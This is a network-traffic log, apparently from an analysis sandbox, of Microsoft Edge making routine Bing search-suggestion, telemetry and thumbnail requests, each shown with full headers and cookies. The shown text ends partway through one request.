cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 9848
date: Wed, 04 Dec 2024 10:08:57 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306937.7f1d31a
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=dark&cp=4&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=dark&cp=4&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 9607
date: Wed, 04 Dec 2024 10:08:57 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306937.7f1d31f
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Ada%2Ci%3A4%2Cig%3ABEC64CE383B54E22987E3EBF5D615810%22%2C%22AnswerInfo%22%3A%22MB%3B10%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306927816%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adar%2Ci%3A5%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306928050%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adar%2Ci%3A5%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306928051%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adar%2Ci%3A5%22%2C%22AsResponseLength%22%3A%221434%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306928184%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adar%2Ci%3A5%2Cig%3ACAEE35BFDB644C6E80DAED8E72E8274E%22%2C%22AnswerInfo%22%3A%22LS%3B11%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306928184%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adar%2Ci%3A5%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306928191%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A3%2C%20%5C%22GL%5C%22%3A8%2C%20%5C%22IG%5C%22%3A%5C%22CAEE35BFDB644C6E80DAED8E72E8274E%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306928191%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adark%2Ci%3A6%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306928330%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adark%2Ci%3A6%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306928339%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Ada%2Ci%3A4%2Cig%3ABEC64CE383B54E22987E3EBF5D615810%22%2C%22AnswerInfo%22%3A%22MB%3B10%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306927816%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adar%2Ci%3A5%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306928050%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adar%2Ci%3A5%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306928051%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adar%2Ci%3A5%22%2C%22AsResponseLength%22%3A%221434%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306928184%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adar%2Ci%3A5%2Cig%3ACAEE35BFDB644C6E80DAED8E72E8274E%22%2C%22AnswerInfo%22%3A%22LS%3B11%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306928184%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adar%2Ci%3A5%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306928191%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A3%2C%20%5C%22GL%5C%22%3A8%2C%20%5C%22IG%5C%22%3A%5C%22CAEE35BFDB644C6E80DAED8E72E8274E%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306928191%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adark%2Ci%3A6%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306928330%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adark%2Ci%3A6%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306928339%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 7607
date: Wed, 04 Dec 2024 10:08:57 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306937.7f1d31e
GET

https://www.bing.com/th?id=OSK.dAQoBR8Uc40XOZquuyugIz0rIAkAQsyzj3EkV4CcWwQ&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.dAQoBR8Uc40XOZquuyugIz0rIAkAQsyzj3EkV4CcWwQ&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:57 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306937.7f1d314
GET

https://www.bing.com/th?id=OSK.32d60ee14c8186dc3e2ab68219472411&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.32d60ee14c8186dc3e2ab68219472411&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 4497
date: Wed, 04 Dec 2024 10:08:57 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306937.7f1d321
GET

https://www.bing.com/th?id=OSK.aa2b6ab42a9ef5e66708bf83c28be5b2&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.aa2b6ab42a9ef5e66708bf83c28be5b2&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 4965
date: Wed, 04 Dec 2024 10:08:57 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306937.7f1d320
GET

https://www.bing.com/th?id=OSK.cd52ddf289423469b6254a25d63cb7db&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.cd52ddf289423469b6254a25d63cb7db&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
